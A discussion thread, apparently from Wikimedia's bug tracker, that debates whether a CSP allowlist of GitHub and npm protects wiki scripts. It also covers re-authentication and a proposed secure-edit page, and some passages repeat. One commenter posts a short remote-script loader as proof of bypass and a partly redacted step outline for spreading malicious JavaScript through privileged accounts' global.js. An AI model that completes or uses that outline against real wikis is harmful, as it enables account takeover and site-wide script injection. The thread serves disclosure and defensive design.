  1. I was not vetted when I created my GitHub account (which was not even owned by Microsoft then).
  2. Accounts created on GitHub do not have to use 2FA at all. So it is not that complicated to guess one of thousands of insecure passwords on GitHub.
  3. Accounts created on npm have to use 2FA, but there is no vetting either. So any attacker can create an npm package.
  4. I can run npm publish without publishing to GitHub. The zip is created locally.
  5. There is no approval process before my npm package is publicly available. When I published my first npm package I thought there would be some process, but there is none.

So CSP might be good for some things, but current CSP is not for what you seem to be aiming for.

Can you link to an example ImportJS text file, and maybe include a code snippet of loading the file, so I can visualize how this works?

Here's an example on Fandom: https://community.fandom.com/wiki/MediaWiki:ImportJS. Each script name is hosted in MediaWiki: namespace or on Dev Wiki.

Fandom's implementation only seems to allow loading of either scripts from dev.fandom.com wiki or from a local wiki. We can perhaps allow only interwiki with other Wikimedia wikis if we were to go this route.

There are legitimate reasons to load external scripts in a user script and in a site script. I wonder there can perhaps also be a global Meta-Wiki page that can allow-list certain scripts and sheets (for example Google Fonts, MDN, etc.) in MediaWiki: namespace.

No one can then compromise an entire wiki by pasting their malicious script onto common.js.

No - a malicious script can be self contained (e.g. in JS converting a function to string results in its source code). Also, even if we disable loading external script, malicious script can simply fetch external (or even in Wikimedia) webpage and eval it.

I think I was talking about paired with the code review process I described above. Interface administrators are expected to have some level of understanding of what they are putting on a wiki, but we can never be too safe.

This took 14 minutes 21 seconds to prepare:

var url = `https://raw.githubusercontent.com/johnnybebad26/wiki-poc-fun/refs/heads/main/poc.js`;
var url = "https://cdn.jsdelivr.net/gh/johnnybebad26/wiki-poc-fun@main/poc.js";
importScriptURI(url);

Yes, I did measure the time with a stopwatch ;). I included both creating an e-mail account (on proton) and creating a new Github account.

And also note this is all generated by AI. I don't have to be coder to do this.

So yeah. Even thought I wouldn't use words stjn used I still agree with what he said. Current solution is more of Security theater then anything else. And on the way adds friction for community.

PS: In case you were wondering: yes, johnnybebad was taken :))

Furthermore, automated edits take—what—well under a second, right?

15 minutes is 900 seconds, so let’s say roughly 1,000 edits. Some patroller would probably notice that rate, but the damage would already be done.

My point is that once you’re compromised, and once the “re‑auth window” is open, the disaster will unfold regardless. It’s like trying to stop a bullet with paper plates. Shortening the re‑auth window would be like adding more plates, while making the experience even more annoying for users. This leads me to think the entire “window of unprotection” approach is fundamentally flawed.

Every edit should be protected. But protection can’t introduce unacceptable friction in the form of tedious manual steps at every edit. So we need a different paradigm—one that aligns with the alternative methods proposed by myself and others above.

I don't usually publish recipes for attacks, but I feel like we will not get anything done without this. I did warn that creating CSP in a rush is just wrong. I did say that the incident is not real, as normally scripts go through a community process that, while not perfect, is far better than what GitHub or NPM has in place.

Why the current system is not the best:

  1. Find a list of active users. This seems convenient, as you can even filter by group: https://apersonbot.toolforge.org/recently-active/ (but of course you can also use Quarry and ChatGPT / Claude / Gemini to get a better list via SQL)
  2. Add that group to an array in JS. Add that script on GitHub.
  3. Create a script that seems useful and lives on GitHub.
  4. [some undisclosed steps that make the attack more feasible]
  5. Load the array of interface admins on Meta and an array of just active users on your target wiki.
  6. Use importScriptURI to load another script from jsdelivr that adds code to global.js on Meta for the current user.
  7. [some undisclosed steps that make the attack more feasible]
  8. Add another script that:
    1. Waits for the page to load. Can be as simple as window.onload.
    2. Checks if the user is on action=edit, the namespace is MediaWiki, and the page title ends with ".js". You can do that in many ways; I'm sure ChatGPT knows at least one of them.
    3. And now... [some undisclosed stuff that I hope is obvious to security staff]
  9. [undisclosed final step]

Write to me if you want the full steps. Above can be prevent with Special:SecureEdit I wrote about above and proper CSP developed properly which I mentioned earlier this year. Re-auth is not needed at all.

There are three ways to modify a .js page under advanced restrictions:

  1. Interactively by some Special:SecureEdit or Special:EditResource etc. which is in safemode.
  2. HTTP POST to index.php a form with all field values from Special:SecureEdit including hidden special safety keys built in when this page is retrieved from wiki server.
  3. Change a set of pages via api.php and provide a special security code for one run only, for this account only, within some days.

The second possibility makes the safemode Special:SecureEdit obsolete, since the wiki server cannot distinguish between a really interactively used page in browser, or an HTTP POST which sends the fields as if the submit button has been pressed manually.

For interactive work I see only two approaches worth to invest manpower and development:

  • Confirm every single edit by some Auth, password, 2FA, captcha etc. Has been called “annoying” above.
  • Use a second account which is safemode for all edits anywhere.
    • If there is a permission given to edit resource pages always, or for the next 14 or 5 or 59 minutes, I can submit API or HTTP POST within this interval, and I can detect that one first resource edit has been made, starting my stopwatch and avoiding unauthorized attempts which might be monitored.
    • If this account is permitted to edit resource pages sometimes, never ever any JS from site or user pages shall be loaded by preferences.
    • If you need some tools for code checking, equipping the page with links to helpful stuff, then you might provide them by Greasemonkey or browser scripts. They cannot be attacked, if you are careful and write it yourself.
    • If this account is not a safemode account, any kind of editinterface should be revocated on the fly.
    • You may use a second browser on the same device, or a special device for editinterface business. There you can stay logged in. By C&P you can exchange text fragments, and regular editing with global WMF tools is available on all pages.

To address the concern that a script on the main domain can still forge POST requests or sniff tokens (as mentioned in point 2 above), one potential path worth mentioning is moving sensitive edits to a dedicated, "naked" domain (e.g., secure-edit.wikimedia.org).

By using a separate origin, this would leverage the browser's Same-Origin Policy (SOP). Scripts running on the main wiki would be effectively blocked from reading the DOM or intercepting CSRF tokens on the secure domain. The server could then accept modifications to .js/.css pages only when they carry the Origin header of this secure domain.

I am only mentioning this as a theoretical direction. Implementing and maintaining such a cross-domain architecture would likely represent a massive amount of work and engineering overhead; however, it is one of the few ways to turn "Safe Mode" into a browser-enforced security boundary.

If I'm reading that correctly, this is not how any of this works, EMill. Microsoft is NOT securing the scripts on GitHub. In fact it's perfectly legal to write proof-of-concept tools for attacking websites like e.g. excessy (tool for XSS). I would like to see anyone try to take down that tool (written by Google's security expert).

  1. I was not vetted when I created my GitHub account (which was not even owned by Microsoft then).
  2. Accounts created on GitHub do not have to use 2FA at all. So it is not that complicated to guess one of thousands of insecure passwords on GitHub.
  3. Accounts created on npm have to use 2FA, but there is no vetting either. So any attacker can create an npm package.
  4. I can run npm publish without publishing to GitHub. The zip is created locally.
  5. There is no approval process before my npm package is publicly available. When I published my first npm package I thought there would be some process, but there is none.

So CSP might be good for some things, but current CSP is not for what you seem to be aiming for.

Oh yes, there is *lots* of risk involved in allowlisting npm as a serving location for code that can run in privileged users' sessions on Wikimedia projects. It is really easy to demonstrate that, and it will not stay in our CSP over the long term.

But even that *lots* of risk is still *much* less than the risks involved in allowing unpredictable internet domains, including domains fully owned and controlled by attackers (unlike npm, which is fully owned and operated by a known company). I recognize it may not feel like a big deal to you since the new status quo still allows attacker-controllable content to be hosted there, but it is still a massive improvement.

Securing user-managed code will happen in stages, and having third-party domains come from a known allowlisted universe is an important stage 1, even if that universe includes some dangerous domains. (And even if we ended up moving there in a clumsy way instead of the planned way we'd hoped for.)

Securing user-managed code will happen in stages, and having third-party domains come from a known allowlisted universe is an important stage 1, even if that universe includes some dangerous domains. (And even if we ended up moving there in a clumsy way instead of the planned way we'd hoped for.)

If a privileged account is permitted to run any JS, which is not originated from the trusted MediaWiki central repository, it is always possible to misuse this, especially for worm proliferation.

  • If it is originated from somewhere in the web, we have no history at all.
  • It may be loaded from site JS, site gadget, user JS of any account. After the nuke happened, we can inspect page history. Fine.

The simple conclusion is: While site or user JS can be loaded, editinterface is to be blocked.

  • If you want to use editinterface etc. membership, the entire account must be in safemode state. Always.
  • If your account does enable site or user JS loading, then the group membership must be suspended.
  • If you can perform interface edits sometimes, and any JS of any source is listening, that can wait for a good occasion and start automatic procedures on behalf of your account.

Therefore CSP does not prevent attacks, but causing breaks. The originating URL does not matter.

VisualEditor is retrieved from MediaWiki central repository, should be clean.

If I'm reading that correctly, this is not how any of this works, EMill. Microsoft is NOT securing the scripts on GitHub. In fact it's perfectly legal to write proof-of-concept tools for attacking websites like e.g. excessy (tool for XSS). I would like to see anyone try to take down that tool (written by Google's security expert).
[...]
So CSP might be good for some things, but current CSP is not for what you seem to be aiming for.

Oh yes, there is *lots* of risk involved in allowlisting npm as a serving location for code that can run in privileged users' sessions on Wikimedia projects. It is really easy to demonstrate that, and it will not stay in our CSP over the long term.

But even that *lots* of risk is still *much* less than the risks involved in allowing unpredictable internet domains, including domains fully owned and controlled by attackers (unlike npm, which is fully owned and operated by a known company). I recognize it may not feel like a big deal to you since the new status quo still allows attacker-controllable content to be hosted there, but it is still a massive improvement.

I'm sorry, but I tried to not say things straight and it is clearly not working. That is not how security works. I don't know if you are a security expert; I assume you are not. Nothing personal, it just doesn't make sense to me what you say. In security, if you have an easy way of bypassing a security wall, then the wall is useless. And that CSP wall is VERY EASY to bypass. I already shown that. I mean please ask someone on your team. You think you have a secure wall, you show the wall, but it's just a facade. Even less then a facade. You've only built it on one side and people just go around it. And on the Internet, going around your wall doesn't take as much effort as in physical world. In fact, now with AI, any kid can bypass that CSP facade. They just need to ask for it.

When you (as in WMF) got flooded with people asking for the next CSP exception, I really hoped you, anyone, would say, "hey, this is not working, let's just revert and work on this later." It boggles my mind, really, why that didn't happen.

There are three ways to modify a .js page under advanced restrictions:

  1. Interactively by some Special:SecureEdit or Special:EditResource etc. which is in safemode.
  2. HTTP POST to index.php a form with all field values from Special:SecureEdit including hidden special safety keys built in when this page is retrieved from wiki server.
  3. Change a set of pages via api.php and provide a special security code for one run only, for this account only, within some days.

The second possibility makes the safemode Special:SecureEdit obsolete, since the wiki server cannot distinguish between a really interactively used page in browser, or an HTTP POST which sends the fields as if the submit button has been pressed manually.

To be clear, my point was that Special:SecureEdit would be a separate form just for special (fragile) edits. It would accept any titles though (for better separation of concerns).

I think I haven't mentioned this, but you would not be able to POST to it from another page. You would not have a token. CSRF tokens are specifically designed to block forged requests. The important part here is that the token must be specific to that page and obviously(?) specific to a single user and obviously(?) just available on that special page.

The GUI could look something like this:

obraz.png (1×1 px, 138 KB)

I've intentionally removed most of the elements. I've kept a history tab because I often open it when I edit JS/CSS to make sure nobody made any changes in the meantime (and other checks). But I think it would be fine even if no tabs were there.

I really think this can be done by the end of the month. Perhaps even next week, if people are free to work on it. The first version could be just that special page. Then (or in parallel), work on a redirect to that special page instead of the current re-auth redirects.

PS: The special page URL adres would be:
https://en.wikipedia.org/wiki/Special:SecureEdit?title=MediaWiki:Common.js
I've made a typo in script visible on the screen :)

Please be careful of the Nirvana fallacy in the comment section of this ticket. Just because a solution (such as the CSP allowlist containing github and npm) isnt perfect doesnt mean it's not helpful. Anything that makes hacking us harder, more time consuming, or makes hackers require more knowledge in order to figure out how to hack us is helpful and will reduce attacks overall.

Incremental progress is also a good thing, because security is a slider with security on one side and user convenience on the other, and moving the slider too fast away from user convenience is not good for user convenience and would generate backlash.

@Novem_Linguae I'm not speaking as a random dude on the internet. I have experience and training in security. You can of course not believe me, but it is not hard to check.

Adding a firewall that has no known bugs but can have a hidden backdoor – that is adding a layer of security. It can maybe be hacked, but it's a layer.

Adding a small time window when some important resource can be edited and still requires something extra... that is adding a thin layer of security, I'll give you that. As shown this is still exploitable and not in a hard way, but it closes some categories of attacks.

Adding a CSP that doesn't have to be hacked – you just do legal stuff anyone can do without any vetting and with little knowledge – that part is theatrics. By theatrics I mean: taking away my perfectly harmless 500 ml water while allowing a terrorist to bring 2 bottles with 250 ml, which they can mix later in the bathroom and get a 500 ml bomb. This is taking away my knitting kit and giving metal forks for dinner to terrorists on the plane... This is adding friction to the wiki community by blocking legitimate requests downloading JSON and doing absolutely nothing to stop attacks with JS executed straight from unsafe domains.

Instead of adding more and more stuff CSP you should have focused on blocking whole categories of attacks. Like discuss removing wss with community and block it completely. Discuss removing eval and block it completely. That would add layers because that would block whole category of attacks. Current CSP is not that so it is mostly useless.

Instead of adding more and more stuff CSP you should have focused on blocking whole categories of attacks. Like discuss removing wss with community and block it completely. Discuss removing eval and block it completely. That would add layers because that would block whole category of attacks. Current CSP is not that so it is mostly useless.

My understanding is that $.append(...), $.prepend(...) and $.html(...) make use of eval-like primitives depending on how they are used. I'm unsure as to how many of the Wikimedia scripts make use of this use case, but removing eval might not be as trivial as just removing it from the CSP.